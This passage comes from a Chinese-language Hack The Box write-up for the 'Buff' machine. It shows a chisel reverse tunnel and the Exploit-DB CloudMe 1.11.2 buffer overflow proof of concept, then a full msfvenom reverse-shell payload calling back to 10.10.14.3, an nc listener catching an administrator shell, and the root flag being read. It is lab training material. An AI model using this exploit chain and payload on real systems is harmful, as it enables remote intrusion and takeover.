      URL: https://www.exploit-db.com/exploits/48389
     Path: /usr/share/exploitdb/exploits/windows/remote/48389.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/48389.py

20、到这里先通过SMB把端口转发的工具放到靶机上面

C:\xampp\htdocs\gym\upload>copy \\10.10.14.3\share\chisel_1.9.1_windows_amd64 C:\Users\shaun\Downloads\c.exe
copy \\10.10.14.3\share\chisel_1.9.1_windows_amd64 C:\Users\shaun\Downloads\c.exe
        1 file(s) copied.

C:\xampp\htdocs\gym\upload>

21、下面开始整个漏洞利用的过程：

1、启动服务端的chisel工具

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ chmod +x ./chisel_1.9.1_linux_arm64 
                                                                                                               
┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./chisel_1.9.1_linux_arm64 server -p 8000 --reverse
2024/02/25 22:27:40 server: Reverse tunnelling enabled
2024/02/25 22:27:40 server: Fingerprint Uaxj5ouL9O3mRQ7uFiIWOBzBzREzabwFHY9Zh5rHTLA=
2024/02/25 22:27:40 server: Listening on http://0.0.0.0:8000

2、开启客户端的chisel工具的连接和转发

C:\xampp\htdocs\gym\upload>cd C:\Users\shaun\Downloads\
cd C:\Users\shaun\Downloads\

C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

25/02/2024  14:24    <DIR>          .
25/02/2024  14:24    <DIR>          ..
25/02/2024  14:14         9,006,080 c.exe
16/06/2020  15:26        17,830,824 CloudMe_1112.exe
13/05/2005  09:53            68,608 nc.exe
               3 File(s)     26,905,512 bytes
               2 Dir(s)   9,805,324,288 bytes free

C:\Users\shaun\Downloads>.\c.exe client 10.10.14.3:8000 R:8888:localhost:8888     
.\c.exe client 10.10.14.3:8000 R:8888:localhost:8888
2024/02/25 14:29:25 client: Connecting to ws://10.10.14.3:8000
2024/02/25 14:29:52 client: Connected (Latency 331.3199ms)


3、成功接收到靶机转发过来的8888端口信息

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./chisel_1.9.1_linux_arm64 server -p 8000 --reverse
2024/02/25 22:27:40 server: Reverse tunnelling enabled
2024/02/25 22:27:40 server: Fingerprint Uaxj5ouL9O3mRQ7uFiIWOBzBzREzabwFHY9Zh5rHTLA=
2024/02/25 22:27:40 server: Listening on http://0.0.0.0:8000
2024/02/25 22:29:52 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening


┌──(kali㉿offsec)-[~/Desktop]
└─$ netstat -ntlp 
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      54039/python3       
tcp        0      0 127.0.0.1:57727         0.0.0.0:*               LISTEN      54039/python3       
tcp        0      0 127.0.0.1:54191         0.0.0.0:*               LISTEN      54039/python3       
tcp6       0      0 :::8888                 :::*                    LISTEN      58039/./chisel_1.9. 
tcp6       0      0 :::8000                 :::*                    LISTEN      58039/./chisel_1.9. 
                                                                                                               
┌──(kali㉿offsec)-[~/Desktop]
└─$ 


4、根据现有poc的代码，修改征程自己需要的代码内容

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat 48389.py 
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"



这里用 msfvenom 生成下自己的代码内容

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -b '\x00\x0A\x0D' -f python -v payload

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1899 bytes
payload =  b""
payload += b"\xbb\x4d\x94\x1f\xda\xd9\xc9\xd9\x74\x24\xf4"
payload += b"\x5a\x2b\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12"
payload += b"\x83\x8f\x90\xfd\x2f\xf3\x71\x83\xd0\x0b\x82"
payload += b"\xe4\x59\xee\xb3\x24\x3d\x7b\xe3\x94\x35\x29"
payload += b"\x08\x5e\x1b\xd9\x9b\x12\xb4\xee\x2c\x98\xe2"
payload += b"\xc1\xad\xb1\xd7\x40\x2e\xc8\x0b\xa2\x0f\x03"
payload += b"\x5e\xa3\x48\x7e\x93\xf1\x01\xf4\x06\xe5\x26"
payload += b"\x40\x9b\x8e\x75\x44\x9b\x73\xcd\x67\x8a\x22"
payload += b"\x45\x3e\x0c\xc5\x8a\x4a\x05\xdd\xcf\x77\xdf"
payload += b"\x56\x3b\x03\xde\xbe\x75\xec\x4d\xff\xb9\x1f"
payload += b"\x8f\x38\x7d\xc0\xfa\x30\x7d\x7d\xfd\x87\xff"
payload += b"\x59\x88\x13\xa7\x2a\x2a\xff\x59\xfe\xad\x74"
payload += b"\x55\x4b\xb9\xd2\x7a\x4a\x6e\x69\x86\xc7\x91"
payload += b"\xbd\x0e\x93\xb5\x19\x4a\x47\xd7\x38\x36\x26"
payload += b"\xe8\x5a\x99\x97\x4c\x11\x34\xc3\xfc\x78\x51"
payload += b"\x20\xcd\x82\xa1\x2e\x46\xf1\x93\xf1\xfc\x9d"
payload += b"\x9f\x7a\xdb\x5a\xdf\x50\x9b\xf4\x1e\x5b\xdc"
payload += b"\xdd\xe4\x0f\x8c\x75\xcc\x2f\x47\x85\xf1\xe5"
payload += b"\xc8\xd5\x5d\x56\xa9\x85\x1d\x06\x41\xcf\x91"
payload += b"\x79\x71\xf0\x7b\x12\x18\x0b\xec\x17\xd7\x1d"
payload += b"\xef\x4f\xe5\x21\xfe\xd3\x60\xc7\x6a\xfc\x24"
payload += b"\x50\x03\x65\x6d\x2a\xb2\x6a\xbb\x57\xf4\xe1"
payload += b"\x48\xa8\xbb\x01\x24\xba\x2c\xe2\x73\xe0\xfb"
payload += b"\xfd\xa9\x8c\x60\x6f\x36\x4c\xee\x8c\xe1\x1b"
payload += b"\xa7\x63\xf8\xc9\x55\xdd\x52\xef\xa7\xbb\x9d"
payload += b"\xab\x73\x78\x23\x32\xf1\xc4\x07\x24\xcf\xc5"
payload += b"\x03\x10\x9f\x93\xdd\xce\x59\x4a\xac\xb8\x33"
payload += b"\x21\x66\x2c\xc5\x09\xb9\x2a\xca\x47\x4f\xd2"
payload += b"\x7b\x3e\x16\xed\xb4\xd6\x9e\x96\xa8\x46\x60"
payload += b"\x4d\x69\x76\x2b\xcf\xd8\x1f\xf2\x9a\x58\x42"
payload += b"\x05\x71\x9e\x7b\x86\x73\x5f\x78\x96\xf6\x5a"
payload += b"\xc4\x10\xeb\x16\x55\xf5\x0b\x84\x56\xdc"


然后进行替换下上述内容


5、开启本地4444端口的监听，并运行exp脚本


┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 48389.py                      
                                                                                                               
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 48389.py


6、成功获取到shell，并读取到flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.198] 49701
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

22、接下来获取最后一个flag信息

C:\Windows\system32>cd C:\Users
cd C:\Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users

16/06/2020  19:52    <DIR>          .
16/06/2020  19:52    <DIR>          ..
20/07/2020  11:08    <DIR>          Administrator
16/06/2020  14:08    <DIR>          Public
16/06/2020  14:11    <DIR>          shaun
               0 File(s)              0 bytes
               5 Dir(s)   9,804,349,440 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\Administrator

20/07/2020  11:08    <DIR>          .
20/07/2020  11:08    <DIR>          ..
18/07/2020  16:36    <DIR>          3D Objects
16/06/2020  15:48    <DIR>          CloudMe
18/07/2020  16:36    <DIR>          Contacts
18/07/2020  16:36    <DIR>          Desktop
18/07/2020  16:36    <DIR>          Documents
18/07/2020  16:36    <DIR>          Downloads
18/07/2020  16:36    <DIR>          Favorites
18/07/2020  16:36    <DIR>          Links
18/07/2020  16:36    <DIR>          Music
16/06/2020  15:44    <DIR>          OneDrive
18/07/2020  16:36    <DIR>          Pictures
18/07/2020  16:36    <DIR>          Saved Games
18/07/2020  16:36    <DIR>          Searches
18/07/2020  16:36    <DIR>          Videos
               0 File(s)              0 bytes
              16 Dir(s)   9,804,673,024 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\Administrator\Desktop

18/07/2020  16:36    <DIR>          .
18/07/2020  16:36    <DIR>          ..
16/06/2020  15:41             1,417 Microsoft Edge.lnk
25/02/2024  09:48                34 root.txt
               2 File(s)          1,451 bytes
               2 Dir(s)   9,804,673,024 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
953f07358bd747447440c411929cdd21

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/263

打靶记

#shooting-range

Buff-htb-writeup

https://sh1yan.top/2024/02/23/Buff-htb-writeup/

作者

shiyan

发布于

2024年2月23日

许可协议

Arctic-htb-writeup 上一篇

Blue-htb-writeup 下一篇